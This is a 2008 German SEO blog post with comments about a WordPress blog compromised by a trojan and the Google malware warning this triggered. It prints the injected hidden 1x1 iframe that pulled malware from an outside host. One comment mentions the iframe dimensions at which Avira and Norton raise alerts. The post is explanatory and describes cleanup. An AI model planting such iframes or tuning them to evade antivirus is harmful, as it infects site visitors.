RSS | Impressum | Sitemap |
Profi-Ranking Suchmaschinenoptimierung

SEO Marketing Blog

.... googeln bis der Arzt kommt

Wordpress mit Trojaner an Bord – Dank der Google Malware Warnung hoffentlich nur ein temporäres Problem …

WordPress mit Trojaner an Bord & der Google Malware Rettungsanker

Jörg (betreibt ne Segelschule am Bodensee) hat mir gerade anhand der Domain boatbuilder.de (ein bloggender Bootsbaulehrling) per Mail gezeigt, wie Google reagiert, wenn ein WordPress System von nem Trojaner infiziert wurde …

Gesehen hatte ich die Zeile “Diese Website kann Ihren Computer beschädigen.” in Google Suchergebnissen vereinzelt bisher schon ab & an.
Hatte bisher nur kein Bedürfnis oder eigenen Anlass zu untersuchen, was der Auslöser dafür sein könnte …

Das es in der Form seitenweit ein komplettes WordPress System betreffen kann, welches definitv nicht absichtlich als Trojaner-Schleuder genutzt wird, war mir in der Form bisher nur theoretisch bewußt.

Nachtrag: Folgender Iframe wurde über den eingeschleusten Code aufgerufen:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0â€Â³ height=”1â€Â³ width=”1â€Â³></iframe>

Der Google Cache wird für die Seiten nicht mehr angezeigt & man gelangt bei Anklicken des Suchergebnisses auf eine Google Malware Warnung – hier mal der Screenshot der Site-Abfrage:

Wordpress boatbuilder.de Google Site-Abfrage mit Malware Warnung wegen Trojaner

… und hier wie Google vor dem Besuch der Seite warnt:

Google Malware Warnung: diese Webseite kann ihren Computer beschädigen

Der Code wurde natürlich umgehend aus dem Blog entfernt, ein WordPress Update umgesetzt & Google gebeten, die Seite zu überprüfen & wieder frei zu geben.

@ Jörg, da Du ja hier mitliest: welche WP-Version war es denn, in die der Trojaner eingeschleust wurde?
Wie hiess der Trojaner Code? Sach Bescheid, sobald Du Feedback von Google bekommst oder die Malware Warnung wieder weg ist.
… und last but not least: Danke Dir für das anschauliche Beispiel ;-)

Nachtrag 12.03.2008:
Gerade kam die Info von Jörg, dass Google bereits auf seine Anfrage reagiert hat & obige Malware Warnung in den Suchergebnissen wieder entfernt hat! Eine erfreulich schnelle Reaktion von Google …


Andere Beiträge mit ähnlichen Inhalten, die Dich evtl. auch interessieren könnten:


Der Artikel " WordPress mit Trojaner an Bord & der Google Malware Rettungsanker " enthält 247 Wörter.

Artikel mit verwandten Tags (Keywords, Suchbegriffe)
Tags: , , , , , ,


Am 10.03.08, 13:17 in Google SEO
von Frank veröffentlicht. RSS Feed für Kommentare.
Du kannst hier kommentieren oder hier per Trackback
von Deinem Blog aus "verewigen".
· Gelesen: 10170 · heute: 4


9 Kommentare zu "WordPress mit Trojaner an Bord & der Google Malware Rettungsanker"

  • 10.03.08 um 13:29:54
    1. Joerg @ segelschule bodensee

    Hallo Frank, welöche WP Version kann ich leider nicht mehr sagen, war ich doch zu sehr in Sorge :)

    Der Trojaner nennt sich “TR/Dldr.HTML.Agent.IS” und wird via iframe über die Seite wp-stats-php(dot)info aufgerufen. Es stand folgender Code in einem Artikel:

    Scheint zwar “nur” den IE zu betreffen, aber dennoch. Selbst nach intensiver Recherche konnte ich bis dato nicht herausfinden wie der Code in den WP Beitrag kommt.

    Neben WP scheint gleicher Code auch in Joomla häufig vorhanden zu sein. Alles was hilft (da der schädliche Code mit in die DB geschrieben wird) ist den betroffenen Beitrag zu löschen und ggf. danach eben wieder neu anzulegen.

    Ich bin mal gespannt wie lange es dauern wird, bis Freund Google die Site wieder Cached und ordentlich listet.

    Werde mich melden, wenn es News gibt.

  • 10.03.08 um 13:39:27
    2. Frank

    @ Jörg

    … da bin ich ja fast froh, dass Du nicht geschafft hast den Code hier einzugeben – nicht dass hier auch alles verseucht wird ;-)

    Schick ihn mir doch bitte per Mail, bastel ihn dann oben rein …

  • 10.03.08 um 13:49:48
    3. Joerg @ segelschule bodensee

    @Frank
    Keine Angst, der Code wäre deutlich “entstellt” gewesen, so dass er keinen Schaden hätte anrichten können! ;-)

    Ich habe ihn dir jetzt per Mail geschickt …

  • 11.03.08 um 03:08:19
    4. Xel

    Joomla ist da extrem anfällig… WordPress aber durch die steigende Verbreitung auch.

    Letztens gabs ne Sicherheitslücke in der XMLRPC Schnittstelle – die funktioniert aber nur dann, wenn der Angreifer ein Benutzerkonto im Blog hat, k.a. ob das dort der Fall gewesen sein kann.

    Alles was hilft (da der schädliche Code mit in die DB geschrieben wird) ist den betroffenen Beitrag zu löschen und ggf. danach eben wieder neu anzulegen.

    Wo steht der denn drin? Im Post oder in nem Kommentar?

    Nebenbei könnte man den Post auch einfach über phpMyAdmin bearbeiten – nutzt nur bei einem einmal geknackten System ansich wenig…

  • 11.03.08 um 09:59:21
    5. Joerg @ segelschule bodensee

    Hallo Xel,

    der schadhafte Code stand im Artikel selbst, nicht in einem Kommentar. Benutzer gab es außer den tatsächlich schreibenden keine weiteren.

  • 20.07.08 um 16:26:55
    6. Webzettel » Eierlegende WordPress-Sau

    […] Blogvernarrte Leute wie ich, die auf WordPress setzen, haben mit jedem Update immer ein wenig zu tun. Um aber gar nicht erst die Erfahrung eines gehackten Weblogs mit Trojanerfalle zu machen, habe ich schnelle Updates auch alter Weblogs angewöhnt. Was WordPress 2.6 angeht so mag zum Beispiel die Versionierung der Beiträge schön und gut sein, meinem Wunschprofil entspricht das aber nicht. Keineswegs erwarte ich eine eierlegende WordPress-Sau, doch möchte ich folgend einmal mein Wunschprogramm loswerden. ;-) […]

  • 22.07.08 um 19:25:19
    7. uhi888

    Hallo Frank,

    vielen Dank für diesen sinnvollen Artikel. Ich hatte auch diesen Sch$%?’*%(-Trojaner in meinen WP-Blog und merkte das auch erst, als meine Besucherzahlen von 300 am Tag auf 30 zusammenbrachen.

    Ich habe jetzt manuell die o. g. Einträge via PHPMyAdmin aus der DB entfernt, da sie sich im Quelltext “versteckt” hatten.

    Jetzt ist der Blog wieder “trojan free” und ich hoffe auf eine schnelle Reaktion von Google und keinen bösen Besuch mehr. Und ich gelobe: Patches und Updates werden zukünftig noch vor dem Frühstück eingespielt.

    Herzliche Grüße
    UHI
    www.hiltmann.net (wird hoffentlich nicht als kommerzieller Link gewertet ;-) falls doch, bitte löschen … ;-)

  • 13.10.08 um 16:25:59
    8. Don

    Hallo :)
    Bei Avira wird übrigens genau das selbe gemeldet, wenn man einen Iframe mit height=0 und width=0 einbindet!
    Bei Norton müsste es ein Iframe im Bereich width & height von 1-10 sein, dann wird der Iframe als HTML Virus erkannt.

    Habe mich bei Avira im Forum gemeldet deswegen,
    konnte nichts erreichen, leider :(

  • 16.11.08 um 23:27:28
    9. Eierlegende WordPress-Sau — Ratatatam

    […] Blogvernarrte Leute wie ich, die auf WordPress setzen, haben mit jedem Update immer ein wenig zu tun. Um aber gar nicht erst die Erfahrung eines gehackten Weblogs mit Trojanerfalle zu machen, habe ich mir schnelle Updates auch alter Weblogs angewöhnt. Was WordPress 2.6 angeht, so mag zum Beispiel die Versionierung der Beiträge schön und gut sein, meinem Wunschprofil entspricht das aber nicht. Keineswegs erwarte ich eine eierlegende WordPress-Sau, doch möchte ich folgend einmal mein Wunschprogramm loswerden. ;-) […]


Deine Ideen zum Artikel: WordPress mit Trojaner an Bord & der Google Malware Rettungsanker

"Namen" wie "Suchmaschinenoptimierung, Reisen, Datenrettung etc." sind unerwünscht - ebenso die Verlinkung auf rein kommerzielle Projekte!
Derartige Verlinkungen werden mit Nofollow versehen, bzw. Kommentare werden entfernt. Kommentar-Links auf themennahe SEO, SEM, Marketing & Webmaster Blogs sind ok
Immer Nofollow gibt es für Blogger, die Nofollow-Links verteilen ;-)

Kommerzielle Werbung in Kommentaren ist diesem SEO Blog nicht erwünscht!

«
»


Entspannen Sie ... wir kümmern uns darum!
Profitieren auch Sie von unserem Google Ranking Know-How!
» Profi Ranking - Suchmaschinenoptimierung «